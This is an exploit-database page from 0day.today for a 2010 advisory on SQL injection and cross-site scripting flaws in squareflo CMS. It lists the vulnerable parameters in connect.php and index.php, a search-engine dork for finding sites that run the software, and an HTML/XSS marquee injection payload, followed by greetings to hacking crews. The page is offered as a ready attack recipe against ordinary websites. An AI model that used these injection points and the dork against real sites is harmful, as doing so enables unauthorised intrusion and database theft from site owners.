[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

squareflo CMS XSS/SQL Injection Vulnerability

Author
cyberlog
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15007
Category
web applications
Date add
01-12-2010
Platform
php
=============================================
squareflo CMS XSS/SQL Injection Vulnerability
=============================================

# Vendor	: http://squareflo.com
# prices	: Not Yet:P
# Discovered by : cyberlog
# Site          : Sekuritionline.net
# Channel       : #SekuritiOnline  & #Bajingan [ Now Just My Bot ]

# Dork          : "Website Design by Squareflo"

# Review	: http://squareflo.com/index.php?page=Work&tag=34


# Exploit       : [site]/connect.php?id= [SQL Injection]
		  [site]/index.php?page=Work&tag= [SQL Injection] [ XSS ]
         	  [site]/index.php?pageid=featured&featureid= [SQL Injection] [ XSS ]
		  
# XSS/HTML Injection : [site]/index.php?pageid=featured&featureid=<marquee><font color=red size=15>XSS</font></marquee>

# Thanks        : GOD,r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz,
jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiLL,blindboy,sukam,pencopet_cinta, pomponk,
SarifJedul,wiro_gendenk,Letjen,ridho_bugs,Ryan_Kabrutz,aurel666,Inof,dbanie, GuA_NinOx, ant0_h@ck, marlon_inside

# special to Mama Sri Rahayu, Member& Staff Sekuritonline,Inj3ct0r, H4ckb0x,JatimCr3w,ManadoCoding, Bajingan Crew, solohackerlink,
# C0li a.k.a antisecurity [ pinjem script perl-na ] 
# Hiroyuki Doni thanks to create New design SO T-shirt P
# Inj3ct0r Now Brothers with Sekuritionline


####################################################

# Demo offline:
# http://localhost/connect.php?id= [SQL Injection]
# http://localhost/index.php?pageid=featured&featureid=<marquee><font color=red size=15>cyberlog isn't hacker :P</font></marquee>


####################################################



#  0day.today [2024-11-16]  #